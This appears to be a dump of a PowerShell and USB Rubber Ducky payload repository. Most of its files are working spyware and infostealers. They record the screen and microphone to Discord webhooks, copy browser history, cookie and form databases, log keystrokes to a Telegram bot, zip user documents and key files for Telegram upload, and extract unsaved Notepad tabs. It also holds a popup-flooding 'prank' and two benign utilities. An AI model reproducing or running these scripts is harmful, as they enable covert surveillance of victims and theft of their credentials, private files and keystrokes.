23 | -------------------------------------------------------------------------------- /Pranks/Hydra-in-Powershell.txt: -------------------------------------------------------------------------------- 1 | REM Title: Hydra In Powershell 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: Uses Powershell to display a popup that if closed, opens 2 more identical windows, thus soon creating many popups! 4 | REM Target: Windows 10,11 5 | 6 | DEFAULT_DELAY 100 7 | 8 | REM open powershell (remove -W Hidden to show the window) 9 | GUI r 10 | DELAY 750 11 | STRING powershell -NoP -NonI -Exec Bypass 12 | ENTER 13 | DELAY 5000 14 | 15 | STRING $Import = '[DllImport("user32.dll")] public static extern bool ShowWindow(int handle, int state);';add-type -name win -member $Import -namespace native;[native.win]::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle, 0);Add-Type -AssemblyName System.Windows.Forms;function Create-Form {$form = New-Object Windows.Forms.Form;$form.Text = " __--** YOU HAVE BEEN INFECTED BY HYDRA **--__ ";$form.Font = 'Microsoft Sans Serif,12,style=Bold';$form.Size = New-Object Drawing.Size(300, 170);$form.StartPosition = 'Manual';$form.BackColor = [System.Drawing.Color]::Black;$form.FormBorderStyle = [System.Windows.Forms.FormBorderStyle]::FixedDialog;$form.ControlBox = $false;$form.Font = 'Microsoft Sans Serif,12,style=bold';$form.ForeColor = "#FF0000";$Text = New-Object Windows.Forms.Label;$Text.Text = "Cut The Head Off The Snake..`n`n ..Two More Will Appear";$Text.Font = 'Microsoft Sans Serif,14';$Text.AutoSize = $true;$Text.Location = New-Object System.Drawing.Point(15, 20);$Close = New-Object Windows.Forms.Button;$Close.Text = "Close?";$Close.Width = 120;$Close.Height = 35;$Close.BackColor = [System.Drawing.Color]::White;$Close.ForeColor = [System.Drawing.Color]::Black;$Close.DialogResult = [System.Windows.Forms.DialogResult]::OK;$Close.Location = New-Object System.Drawing.Point(85, 100);$Close.Font = 'Microsoft Sans Serif,12,style=Bold';$form.Controls.AddRange(@($Text, $Close));return $form};while($true){$form = Create-Form;$form.StartPosition = 'Manual';$form.Location = New-Object System.Drawing.Point((Get-Random -Minimum 0 -Maximum 1000), (Get-Random -Minimum 0 -Maximum 1000));$result = $form.ShowDialog();if ($result -eq [System.Windows.Forms.DialogResult]::OK) {$form2 = Create-Form;$form2.StartPosition = 'Manual';$form2.Location = New-Object System.Drawing.Point((Get-Random -Minimum 0 -Maximum 1000), (Get-Random -Minimum 0 -Maximum 1000));$form2.Show()}$random = (Get-Random -Minimum 0 -Maximum 2);Sleep $random} 16 | ENTER 17 | -------------------------------------------------------------------------------- /Record-Screen-to-Discord/main.ps1: -------------------------------------------------------------------------------- 1 | <#==================== RECORD SCREEN TO DISCORD ========================= 2 | 3 | SYNOPSIS 4 | This script records the screen for a specified time to a mkv file, then sends the file to a discord webhook. 5 | 6 | #> 7 | 8 | $hookurl = "$dc" 9 | if ($hookurl.Ln -lt 120){$hookurl = (irm $hookurl).url} 10 | 11 | while($true){ 12 | 13 | Function RecordScreen{ 14 | param ([int[]]$t) 15 | if ($t.Length -eq 0){$t = 10} 16 | $Path = "$env:Temp\ffmpeg.exe" 17 | If (!(Test-Path $Path)){ 18 | $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = ":hourglass: ``Downloading ffmpeg.exe. Please wait...`` :hourglass:"} | ConvertTo-Json 19 | Invoke-RestMethod -Uri $hookurl -Method Post -ContentType "application/json" -Body $jsonsys 20 | $tempDir = "$env:temp" 21 | $apiUrl = "https://api.github.com/repos/GyanD/codexffmpeg/releases/latest" 22 | $response = Invoke-WebRequest -Uri $apiUrl -Headers @{ "User-Agent" = "PowerShell" } -UseBasicParsing 23 | $release = $response.Content | ConvertFrom-Json 24 | $asset = $release.assets | Where-Object { $_.name -like "*essentials_build.zip" } 25 | $zipUrl = $asset.browser_download_url 26 | $zipFilePath = Join-Path $tempDir $asset.name 27 | $extractedDir = Join-Path $tempDir ($asset.name -replace '.zip$', '') 28 | Invoke-WebRequest -Uri $zipUrl -OutFile $zipFilePath 29 | Expand-Archive -Path $zipFilePath -DestinationPath $tempDir -Force 30 | Move-Item -Path (Join-Path $extractedDir 'bin\ffmpeg.exe') -Destination $tempDir -Force 31 | Remove-Item -Path $zipFilePath -Force 32 | Remove-Item -Path $extractedDir -Recurse -Force 33 | } 34 | $mkvPath = "$env:Temp\ScreenClip.mp4" 35 | $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = ":arrows_counterclockwise: ``Recording screen (24mb Clip)`` :arrows_counterclockwise:"} | ConvertTo-Json 36 | Invoke-RestMethod -Uri $hookurl -Method Post -ContentType "application/json" -Body $jsonsys 37 | .$env:Temp\ffmpeg.exe -f gdigrab -framerate 20 -t 20 -i desktop -vcodec libx264 -preset fast -crf 18 -pix_fmt yuv420p -movflags +faststart $mkvPath 38 | # .$env:Temp\ffmpeg.exe -f gdigrab -framerate 5 -i desktop -fs 24000000 $mkvPath 39 | curl.exe -F file1=@"$mkvPath" $hookurl | Out-Null 40 | sleep 1 41 | rm -Path $mkvPath -Force 42 | } 43 | 44 | RecordScreen 45 | 46 | } 47 | -------------------------------------------------------------------------------- /Mouse-Monitor-to-Discord/main.ps1: -------------------------------------------------------------------------------- 1 | $whuri = "$dc" 2 | 3 | $signature = @' 4 | [DllImport("user32.dll")] 5 | [return: MarshalAs(UnmanagedType.Bool)] 6 | public static extern bool GetCursorPos(out POINT lpPoint); 7 | [StructLayout(LayoutKind.Sequential)] 8 | public struct POINT 9 | { 10 | public int X; 11 | public int Y; 12 | } 13 | '@ 14 | 15 | $timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss" 16 | $outpath = "$env:temp\info.txt" 17 | $cursorType = Add-Type -MemberDefinition $signature -Name "CursorPos" -Namespace "Win32" -PassThru 18 | $prevX = 0 19 | $idleThreshold = New-TimeSpan -Seconds 60 20 | $lastActivityTime = [System.DateTime]::Now 21 | $isActive = $true 22 | $iActive = $true 23 | sleep 1 24 | 25 | while ($true) { 26 | $cursorPos = New-Object Win32.CursorPos+POINT 27 | [Win32.CursorPos]::GetCursorPos([ref]$cursorPos) | Out-Null 28 | $currentX = $cursorPos.X 29 | $currentTime = [System.DateTime]::Now 30 | 31 | if ($currentX -ne $prevX) { 32 | if ($iActive) { 33 | $prevX = $currentX 34 | $lastActivityTime = $currentTime 35 | 36 | if ($idleTime -lt $idleThreshold) { 37 | $msgsys = "[$timestamp] : Mouse is active" 38 | $escmsgsys = $msgsys -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')} 39 | $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = $escmsgsys} | ConvertTo-Json 40 | Invoke-RestMethod -Uri $whuri -Method Post -ContentType "application/json" -Body $jsonsys 41 | } 42 | $iActive = $false 43 | } 44 | } 45 | else { 46 | $iActive = $true 47 | } 48 | 49 | 50 | $idleTime = $currentTime - $lastActivityTime 51 | 52 | if ($idleTime -ge $idleThreshold) { 53 | if ($isActive) { 54 | $msgsys = "[$timestamp] : Mouse has been inactive for 60 seconds" 55 | $escmsgsys = $msgsys -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')} 56 | $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = $escmsgsys} | ConvertTo-Json 57 | Invoke-RestMethod -Uri $whuri -Method Post -ContentType "application/json" -Body $jsonsys 58 | $isActive = $false 59 | $iActive = $true 60 | } 61 | else { 62 | } 63 | } 64 | else { 65 | $isActive = $true 66 | } 67 | Start-Sleep -Milliseconds 60 68 | } 69 | 70 | -------------------------------------------------------------------------------- /Chrome-DB-to-Discord/main.ps1: -------------------------------------------------------------------------------- 1 | 2 | $dc = "$dc" 3 | $temp = [System.IO.Path]::GetTempPath() 4 | $tempFolder = Join-Path -Path $temp -ChildPath 'dbfiles' 5 | $googledest = Join-Path -Path $tempFolder -ChildPath 'google' 6 | $mozdest = Join-Path -Path $tempFolder -ChildPath 'firefox' 7 | $edgedest = Join-Path -Path $tempFolder -ChildPath 'edge' 8 | New-Item -Path $tempFolder -ItemType Directory -Force 9 | sleep 1 10 | New-Item -Path $googledest -ItemType Directory -Force 11 | New-Item -Path $mozdest -ItemType Directory -Force 12 | New-Item -Path $edgedest -ItemType Directory -Force 13 | 14 | sleep 1 15 | 16 | Function CopyFiles { 17 | 18 | param ([string]$dbfile,[string]$folder,[switch]$db) 19 | 20 | Write-Host "Input : $dbfile Selected" 21 | Write-Host "Folder : $folder Selected" 22 | 23 | $filesToCopy = Get-ChildItem -Path $dbfile -Filter '*' -Recurse | Where-Object { $_.Name -like 'Web Data' -or $_.Name -like 'History' -or $_.Name -like 'formhistory.sqlite' -or $_.Name -like 'places.sqlite' -or $_.Name -like 'cookies.sqlite'} 24 | 25 | foreach ($file in $filesToCopy) { 26 | 27 | Write-Host $file 28 | $randomLetters = -join ((65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_}) 29 | if ($db -eq $true){ 30 | $newFileName = $file.BaseName + "_" + $randomLetters + $file.Extension + '.db' 31 | } 32 | else{ 33 | $newFileName = $file.BaseName + "_" + $randomLetters + $file.Extension 34 | } 35 | $destination = Join-Path -Path $folder -ChildPath $newFileName 36 | Copy-Item -Path $file.FullName -Destination $destination -Force 37 | } 38 | 39 | } 40 | 41 | $script:googleDir = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data" 42 | $script:firefoxDir = Get-ChildItem -Path "$Env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles" -Directory | Where-Object { $_.Name -like '*.default-release' };$firefoxDir = $firefoxDir.FullName 43 | $script:edgeDir = "$Env:USERPROFILE\AppData\Local\Microsoft\Edge\User Data" 44 | 45 | copyFiles -dbfile $googleDir -folder $googledest -db 46 | copyFiles -dbfile $firefoxDir -folder $mozdest 47 | copyFiles -dbfile $edgeDir -folder $edgedest -db 48 | 49 | $zipFileName = [System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), "dbfiles.zip") 50 | Compress-Archive -Path $tempFolder -DestinationPath $zipFileName 51 | 52 | Remove-Item -Path $tempFolder -Recurse -Force 53 | 54 | curl.exe -F file1=@"$zipFileName" $dc | Out-Null 55 | sleep 1 56 | Remove-Item -Path $zipFileName -Recurse -Force 57 | -------------------------------------------------------------------------------- /Record-Mic-to-Discord/main.ps1: -------------------------------------------------------------------------------- 1 | <#==================== RECORD MICROPHONE TO DISCORD ========================= 2 | 3 | SYNOPSIS 4 | This script finds the default microphone and records for a specified time to a mp3 file, then sends the file to a discord webhook. 5 | 6 | #> 7 | $hookurl = "$dc" 8 | if ($hookurl.Ln -lt 120){$hookurl = (irm $hookurl).url} 9 | 10 | Function RecordAudio{ 11 | param ([int[]]$t) 12 | 13 | $Path = "$env:Temp\ffmpeg.exe" 14 | 15 | If (!(Test-Path $Path)){ 16 | $tempDir = "$env:temp" 17 | $apiUrl = "https://api.github.com/repos/GyanD/codexffmpeg/releases/latest" 18 | $response = Invoke-WebRequest -Uri $apiUrl -Headers @{ "User-Agent" = "PowerShell" } -UseBasicParsing 19 | $release = $response.Content | ConvertFrom-Json 20 | $asset = $release.assets | Where-Object { $_.name -like "*essentials_build.zip" } 21 | $zipUrl = $asset.browser_download_url 22 | $zipFilePath = Join-Path $tempDir $asset.name 23 | $extractedDir = Join-Path $tempDir ($asset.name -replace '.zip$', '') 24 | Invoke-WebRequest -Uri $zipUrl -OutFile $zipFilePath 25 | Expand-Archive -Path $zipFilePath -DestinationPath $tempDir -Force 26 | Move-Item -Path (Join-Path $extractedDir 'bin\ffmpeg.exe') -Destination $tempDir -Force 27 | Remove-Item -Path $zipFilePath -Force 28 | Remove-Item -Path $extractedDir -Recurse -Force 29 | Write-Output "FFmpeg has been downloaded and extracted to $tempDir" 30 | } 31 | 32 | sleep 1 33 | 34 | Add-Type '[Guid("D666063F-1587-4E43-81F1-B948E807363F"), InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]interface IMMDevice {int a(); int o();int GetId([MarshalAs(UnmanagedType.LPWStr)] out string id);}[Guid("A95664D2-9614-4F35-A746-DE8DB63617E6"), InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]interface IMMDeviceEnumerator {int f();int GetDefaultAudioEndpoint(int dataFlow, int role, out IMMDevice endpoint);}[ComImport, Guid("BCDE0395-E52F-467C-8E3D-C4579291692E")] class MMDeviceEnumeratorComObject { }public static string GetDefault (int direction) {var enumerator = new MMDeviceEnumeratorComObject() as IMMDeviceEnumerator;IMMDevice dev = null;Marshal.ThrowExceptionForHR(enumerator.GetDefaultAudioEndpoint(direction, 1, out dev));string id = null;Marshal.ThrowExceptionForHR(dev.GetId(out id));return id;}' -name audio -Namespace system 35 | function getFriendlyName($id) {$reg = "HKLM:\SYSTEM\CurrentControlSet\Enum\SWD\MMDEVAPI\$id";return (get-ItemProperty $reg).FriendlyName} 36 | $id1 = [audio]::GetDefault(1);$MicName = "$(getFriendlyName $id1)"; Write-Output $MicName 37 | 38 | $mp3Path = "$env:Temp\AudioClip.mp3" 39 | 40 | if ($t.Length -eq 0){$t = 10} 41 | 42 | .$env:Temp\ffmpeg.exe -f dshow -i audio="$MicName" -t $t -c:a libmp3lame -ar 44100 -b:a 128k -ac 1 $mp3Path 43 | 44 | curl.exe -F file1=@"$mp3Path" $hookurl | Out-Null 45 | sleep 1 46 | rm -Path $mp3Path -Force 47 | 48 | } 49 | 50 | RecordAudio -t 120 # time to record microphone in seconds 51 | -------------------------------------------------------------------------------- /Filetype-Organizer/main.ps1: -------------------------------------------------------------------------------- 1 | 2 | $Host.UI.RawUI.BackgroundColor = "Black" 3 | Clear-Host 4 | $width = 88 5 | $height = 30 6 | [Console]::SetWindowSize($width, $height) 7 | $windowTitle = " BeigeTools | Filetype Organizer" 8 | [Console]::Title = $windowTitle 9 | Write-Host "=======================================================================================" -ForegroundColor Green 10 | Write-Host "============================= BeigeTools | Filetype Organizer =================================" -ForegroundColor Green 11 | Write-Host "=======================================================================================`n" -ForegroundColor Green 12 | Write-Host "More info at : https://github.com/beigeworm" -ForegroundColor DarkGray 13 | Write-Host "Starts a GUI window to select a folder, then search for every file with a selected filetype and output to respective named files in the root folder.`n" 14 | 15 | # Get the directory of the script 16 | $scriptDirectory = Split-Path -Parent $MyInvocation.MyCommand.Definition 17 | 18 | # Prompt user for file extensions 19 | $fileExtensions = Read-Host "Enter file extensions separated by commas (e.g., jpg,mp4,png)" 20 | 21 | # Convert the input into an array 22 | $fileExtensionsArray = $fileExtensions -split ',' 23 | 24 | # Prompt user for folder to search recursively 25 | $folderPath = Read-Host "Enter the folder path to search recursively" 26 | 27 | # Prompt user to choose between move or copy 28 | $operation = Read-Host "Enter 'M' to move files, 'C' to copy files" 29 | 30 | # Validate the user input for the operation 31 | if ($operation -ne 'M' -and $operation -ne 'C') { 32 | Write-Host "Invalid operation. Please enter 'M' for move or 'C' for copy." 33 | exit 34 | } 35 | 36 | # Create output folders in the script directory 37 | foreach ($extension in $fileExtensionsArray) { 38 | $folderName = $extension.Trim() 39 | $folderPathForExtension = Join-Path $scriptDirectory $folderName 40 | New-Item -ItemType Directory -Path $folderPathForExtension -Force 41 | } 42 | 43 | # Search for files and move/copy to appropriate folders 44 | foreach ($extension in $fileExtensionsArray) { 45 | $files = Get-ChildItem -Path $folderPath -Recurse -Include "*.$extension" 46 | 47 | foreach ($file in $files) { 48 | $destinationFolder = Join-Path $scriptDirectory $extension.Trim() 49 | 50 | if ($operation -eq 'M') { 51 | $ind = $file.FullName 52 | Move-Item $file.FullName -Destination $destinationFolder -Force 53 | Write-Host "Moved : $ind" 54 | 55 | } elseif ($operation -eq 'C') { 56 | $ind = $file.FullName 57 | Copy-Item $file.FullName -Destination $destinationFolder -Force 58 | Write-Host "Copied : $ind" 59 | } 60 | } 61 | } 62 | 63 | Write-Host "Operation Complete." -ForegroundColor Green 64 | pause -------------------------------------------------------------------------------- /Telegram-Keylogger/main.ps1: -------------------------------------------------------------------------------- 1 | $Token = "$tg" 2 | $PassPhrase = "$env:COMPUTERNAME" 3 | $URL='https://api.telegram.org/bot{0}' -f $Token 4 | while($chatID.length -eq 0){ 5 | $updates = Invoke-RestMethod -Uri ($url + "/getUpdates") 6 | if ($updates.ok -eq $true) {$latestUpdate = $updates.result[-1] 7 | if ($latestUpdate.message -ne $null){$chatID = $latestUpdate.message.chat.id}} 8 | Sleep 10 9 | } 10 | 11 | Function KeyCapture { 12 | $MessageToSend = New-Object psobject 13 | $MessageToSend | Add-Member -MemberType NoteProperty -Name 'chat_id' -Value $ChatID 14 | $MessageToSend | Add-Member -MemberType NoteProperty -Name 'text' -Value "$env:COMPUTERNAME : KeyCapture Started." -Force 15 | irm -Method Post -Uri ($URL +'/sendMessage') -Body ($MessageToSend | ConvertTo-Json) -ContentType "application/json" 16 | $API = '[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] public static extern short GetAsyncKeyState(int virtualKeyCode); [DllImport("user32.dll", CharSet=CharSet.Auto)]public static extern int GetKeyboardState(byte[] keystate);[DllImport("user32.dll", CharSet=CharSet.Auto)]public static extern int MapVirtualKey(uint uCode, int uMapType);[DllImport("user32.dll", CharSet=CharSet.Auto)]public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);' 17 | $API = Add-Type -MemberDefinition $API -Name 'Win32' -Namespace API -PassThru 18 | $LastKeypressTime = [System.Diagnostics.Stopwatch]::StartNew() 19 | $KeypressThreshold = [TimeSpan]::FromSeconds(10) 20 | While ($true){ 21 | $keyPressed = $false 22 | try{ 23 | while ($LastKeypressTime.Elapsed -lt $KeypressThreshold) { 24 | Start-Sleep -Milliseconds 30 25 | for ($asc = 8; $asc -le 254; $asc++){ 26 | $keyst = $API::GetAsyncKeyState($asc) 27 | if ($keyst -eq -32767) { 28 | $keyPressed = $true 29 | $LastKeypressTime.Restart() 30 | $null = [console]::CapsLock 31 | $vtkey = $API::MapVirtualKey($asc, 3) 32 | $kbst = New-Object Byte[] 256 33 | $checkkbst = $API::GetKeyboardState($kbst) 34 | $logchar = New-Object -TypeName System.Text.StringBuilder 35 | if ($API::ToUnicode($asc, $vtkey, $kbst, $logchar, $logchar.Capacity, 0)) { 36 | $LString = $logchar.ToString() 37 | if ($asc -eq 8) {$LString = "[BKSP]"} 38 | if ($asc -eq 13) {$LString = "[ENT]"} 39 | if ($asc -eq 27) {$LString = "[ESC]"} 40 | $nosave += $LString 41 | }}}}} 42 | finally{ 43 | If ($keyPressed) { 44 | $escmsgsys = $nosave -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')} 45 | $timestamp = Get-Date -Format "dd-MM-yyyy HH:mm:ss" 46 | $escmsg = "Keys Captured : "+$escmsgsys 47 | $MessageToSend | Add-Member -MemberType NoteProperty -Name 'text' -Value "$escmsg" -Force 48 | irm -Method Post -Uri ($URL +'/sendMessage') -Body ($MessageToSend | ConvertTo-Json) -ContentType "application/json" 49 | $keyPressed = $false 50 | $nosave = "" 51 | } 52 | } 53 | $LastKeypressTime.Restart() 54 | Start-Sleep -Milliseconds 10 55 | } 56 | } 57 | -------------------------------------------------------------------------------- /Image-to-Console/main.ps1: -------------------------------------------------------------------------------- 1 | <#==================== Image to Powershell Console =============================== 2 | 3 | SYNOPSIS 4 | Convert an image to Powershell console. 5 | 6 | CREDIT 7 | All credit and kudos to I-Am-Jakoby on Github for this script. 8 | 9 | #> 10 | 11 | [Console]::BackgroundColor = "Black" 12 | [Console]::CursorVisible = $false 13 | $wshell = New-Object -ComObject wscript.shell; 14 | $wshell.AppActivate("Powershell.exe") 15 | $wshell.SendKeys("{F11}") 16 | cls 17 | $fpath = "$env:temp/img.png" 18 | iwr -uri https://i.imgur.com/gUkR5qp.png -O $fpath 19 | 20 | Function PS-Draw{ 21 | param([String] [parameter(mandatory=$true, Valuefrompipeline = $true)] $Path,[Switch] $ToASCII) 22 | Begin{ 23 | [void] [System.Reflection.Assembly]::LoadWithPartialName('System.drawing') 24 | $Colors = @{ 25 | 'FF000000' = 'White' 26 | 'FFFFFFFF' = 'Black' 27 | 'FF000080' = 'DarkBlue' 28 | 'FF008000' = 'DarkGreen' 29 | 'FF008080' = 'DarkCyan' 30 | 'FF800000' = 'DarkRed' 31 | 'FF800080' = 'DarkMagenta' 32 | 'FF808000' = 'DarkYellow' 33 | 'FFC0C0C0' = 'Gray' 34 | 'FF808080' = 'DarkGray' 35 | 'FF0000FF' = 'Blue' 36 | 'FF00FF00' = 'Green' 37 | 'FF00FFFF' = 'Cyan' 38 | 'FFFF0000' = 'Red' 39 | 'FFFF00FF' = 'Magenta' 40 | 'FFFFFF00' = 'Yellow' 41 | } 42 | Function Get-ClosestConsoleColor($PixelColor){ 43 | ($(foreach ($item in $Colors.Keys) { 44 | [pscustomobject]@{ 45 | 'Color' = $Item 46 | 'Diff' = [math]::abs([convert]::ToInt32($Item,16) - [convert]::ToInt32($PixelColor,16)) 47 | } 48 | }) | Sort-Object Diff)[0].color 49 | } 50 | } 51 | Process 52 | { 53 | Foreach($item in $Path){ 54 | $BitMap = [System.Drawing.Bitmap]::FromFile((Get-Item $Item).fullname) 55 | Foreach($y in (1..($BitMap.Height-1))) 56 | { 57 | Foreach($x in (1..($BitMap.Width-1))){ 58 | $Pixel = $BitMap.GetPixel($X,$Y) 59 | $BackGround = $Colors.Item((Get-ClosestConsoleColor $Pixel.name)) 60 | If($ToASCII){ 61 | Write-Host "$([Char](Get-Random -Maximum 126 -Minimum 33))" -NoNewline -ForegroundColor $BackGround 62 | } 63 | else{ 64 | Write-Host " " -NoNewline -BackgroundColor $BackGround 65 | } 66 | } 67 | Write-Host '' 68 | } 69 | } 70 | } 71 | end{} 72 | } 73 | 74 | 75 | Add-Type -AssemblyName System.Windows.Forms 76 | 77 | $fpath | PS-Draw -ToASCII 78 | 79 | sleep 5 80 | 81 | $o=New-Object -ComObject WScript.Shell 82 | $i = 0 83 | while ($i -lt 12){ 84 | $o.SendKeys("^+-") 85 | $i++ 86 | sleep -Milliseconds 200 87 | } 88 | -------------------------------------------------------------------------------- /Exfiltrate-to-Telegram/main.ps1: -------------------------------------------------------------------------------- 1 | $Token = "$tg" 2 | $URL='https://api.telegram.org/bot{0}' -f $Token 3 | 4 | while($chatID.length -eq 0){ 5 | $updates = Invoke-RestMethod -Uri ($url + "/getUpdates") 6 | if ($updates.ok -eq $true) {$latestUpdate = $updates.result[-1] 7 | if ($latestUpdate.message -ne $null){$chatID = $latestUpdate.message.chat.id}} 8 | Sleep 10 9 | } 10 | 11 | Function Exfiltrate { 12 | 13 | param ([string[]]$FileType,[string[]]$Path) 14 | $maxZipFileSize = 50MB 15 | $currentZipSize = 0 16 | $index = 1 17 | $zipFilePath ="$env:temp/Loot$index.zip" 18 | $MessageToSend = New-Object psobject 19 | $MessageToSend | Add-Member -MemberType NoteProperty -Name 'chat_id' -Value $ChatID 20 | $MessageToSend | Add-Member -MemberType NoteProperty -Name 'text' -Value "$env:COMPUTERNAME : Exfiltration Started." -Force 21 | irm -Method Post -Uri ($URL +'/sendMessage') -Body ($MessageToSend | ConvertTo-Json) -ContentType "application/json" 22 | 23 | If($Path -ne $null){ 24 | $foldersToSearch = "$env:USERPROFILE\"+$Path 25 | }else{ 26 | $foldersToSearch = @("$env:USERPROFILE\Documents","$env:USERPROFILE\Desktop","$env:USERPROFILE\Downloads","$env:USERPROFILE\OneDrive","$env:USERPROFILE\Pictures","$env:USERPROFILE\Videos") 27 | } 28 | 29 | If($FileType -ne $null){ 30 | $fileExtensions = "*."+$FileType 31 | }else { 32 | $fileExtensions = @("*.log", "*.db", "*.txt", "*.doc", "*.pdf", "*.jpg", "*.jpeg", "*.png", "*.wdoc", "*.xdoc", "*.cer", "*.key", "*.xls", "*.xlsx", "*.cfg", "*.conf", "*.wpd", "*.rft") 33 | } 34 | 35 | Add-Type -AssemblyName System.IO.Compression.FileSystem 36 | $zipArchive = [System.IO.Compression.ZipFile]::Open($zipFilePath, 'Create') 37 | $escmsg = "Files from : "+$env:COMPUTERNAME 38 | 39 | foreach ($folder in $foldersToSearch) { 40 | foreach ($extension in $fileExtensions) { 41 | $files = Get-ChildItem -Path $folder -Filter $extension -File -Recurse 42 | foreach ($file in $files) { 43 | $fileSize = $file.Length 44 | if ($currentZipSize + $fileSize -gt $maxZipFileSize) { 45 | $zipArchive.Dispose() 46 | $currentZipSize = 0 47 | curl.exe -F chat_id="$ChatID" -F document=@"$zipFilePath" "https://api.telegram.org/bot$Token/sendDocument" 48 | Remove-Item -Path $zipFilePath -Force 49 | Sleep 1 50 | $index++ 51 | $zipFilePath ="$env:temp/Loot$index.zip" 52 | $zipArchive = [System.IO.Compression.ZipFile]::Open($zipFilePath, 'Create') 53 | } 54 | $entryName = $file.FullName.Substring($folder.Length + 1) 55 | [System.IO.Compression.ZipFileExtensions]::CreateEntryFromFile($zipArchive, $file.FullName, $entryName) 56 | $currentZipSize += $fileSize 57 | } 58 | } 59 | } 60 | $zipArchive.Dispose() 61 | curl.exe -F chat_id="$ChatID" -F document=@"$zipFilePath" "https://api.telegram.org/bot$Token/sendDocument" 62 | Remove-Item -Path $zipFilePath -Force 63 | Write-Output "$env:COMPUTERNAME : Exfiltration Complete." 64 | } 65 | 66 | 67 | # Define What you want to search for (examples at the top) 68 | Exfiltrate 69 | -------------------------------------------------------------------------------- /Unsaved-Notepad-to-Discord/main.ps1: -------------------------------------------------------------------------------- 1 | <#========================== Notepad Tab Contents to Discord =============================== 2 | 3 | SYNOPSIS 4 | In Windows 11 notepad stores unsaved tabs for reopening notepad.... very unsafe. 5 | This is a script to find any unsaved notes in notepad and send them to a discord webhook. 6 | 7 | USAGE 8 | 1. Uncomment and Change YOUR_WEBHOOK_HERE to your own webhook 9 | 2. run the script on a target system. 10 | 3. Check Discord for results 11 | 12 | #> 13 | 14 | # $dc = 'YOUR_WEBHOOK_HERE' 15 | 16 | $hookurl = "$dc" 17 | 18 | $outpath = "$env:TMP\notepad.txt" 19 | 20 | $appDataDir = [Environment]::GetFolderPath('LocalApplicationData') 21 | $directoryRelative = "Packages\Microsoft.WindowsNotepad_*\LocalState\TabState" 22 | $matchingDirectories = Get-ChildItem -Path (Join-Path -Path $appDataDir -ChildPath 'Packages') -Filter 'Microsoft.WindowsNotepad_*' -Directory 23 | 24 | foreach ($dir in $matchingDirectories) { 25 | $fullPath = Join-Path -Path $dir.FullName -ChildPath 'LocalState\TabState' 26 | $listOfBinFiles = Get-ChildItem -Path $fullPath -Filter *.bin 27 | foreach ($fullFilePath in $listOfBinFiles) { 28 | if ($fullFilePath.Name -like '*.0.bin' -or $fullFilePath.Name -like '*.1.bin') { 29 | continue 30 | } 31 | 32 | $seperator = ("=" * 60) 33 | $SMseperator = ("-" * 60) 34 | $seperator | Out-File -FilePath $outpath -Append 35 | $filename = $fullFilePath.Name 36 | $contents = [System.IO.File]::ReadAllBytes($fullFilePath.FullName) 37 | $isSavedFile = $contents[3] 38 | 39 | if ($isSavedFile -eq 1) { 40 | $lengthOfFilename = $contents[4] 41 | $filenameEnding = 5 + $lengthOfFilename * 2 42 | $originalFilename = [System.Text.Encoding]::Unicode.GetString($contents[5..($filenameEnding - 1)]) 43 | "Found saved file : $originalFilename" | Out-File -FilePath $outpath -Append 44 | $filename | Out-File -FilePath $outpath -Append 45 | $SMseperator | Out-File -FilePath $outpath -Append 46 | Get-Content -Path $originalFilename -Raw | Out-File -FilePath $outpath -Append 47 | 48 | 49 | } else { 50 | "Found an unsaved tab!" | Out-File -FilePath $outpath -Append 51 | $filename | Out-File -FilePath $outpath -Append 52 | $SMseperator | Out-File -FilePath $outpath -Append 53 | $filenameEnding = 0 54 | $delimeterStart = [array]::IndexOf($contents, 0, $filenameEnding) 55 | $delimeterEnd = [array]::IndexOf($contents, 1, $filenameEnding) 56 | 57 | $fileMarker = $contents[($delimeterStart + 2)..($delimeterEnd - 1)] 58 | $fileMarker = -join ($fileMarker | ForEach-Object { [char]$_ }) 59 | 60 | $originalFileContents = [System.Text.Encoding]::Unicode.GetString($contents[($delimeterEnd + 4 + $fileMarker.Length)..($contents.Length - 6)]) 61 | $originalFileContents | Out-File -FilePath $outpath -Append 62 | } 63 | "`n" | Out-File -FilePath $outpath -Append 64 | } 65 | } 66 | 67 | curl.exe -F file1=@"$outpath" $hookurl 68 | Sleep 2 69 | Remove-Item -Path $outpath -force -------------------------------------------------------------------------------- /OSINT/Keylogger from base64 to Discord.txt: -------------------------------------------------------------------------------- 1 | REM Title: Keylogger from base64 to Discord 2 | REM Author: @beigeworm 3 | REM Description: Uses Powershell to gather keystroke info and send it via Discord. 4 | REM Target: Windows 10 5 | REM LEARN MORE HERE - https://github.com/beigeworm/Powershell-Tools-and-Toys 6 | 7 | REM *SETUP* 8 | REM replace WEBHOOK_GOES_HERE with your discord webhook. 9 | 10 | 11 | REM some setup for dukie script 12 | DEFAULT_DELAY 100 13 | 14 | REM Open Powershell and start logs. 15 | DELAY 1000 16 | GUI r 17 | DELAY 500 18 | STRING powershell -NoP -NonI -Exec Bypass 19 | ENTER 20 | DELAY 5000 21 | 22 | STRING '$dc = "WEBHOOK_GOES_HERE!"' | Out-File -FilePath "$env:temp/a.ps1" -Force 23 | ENTER 24 | STRING $b64 = 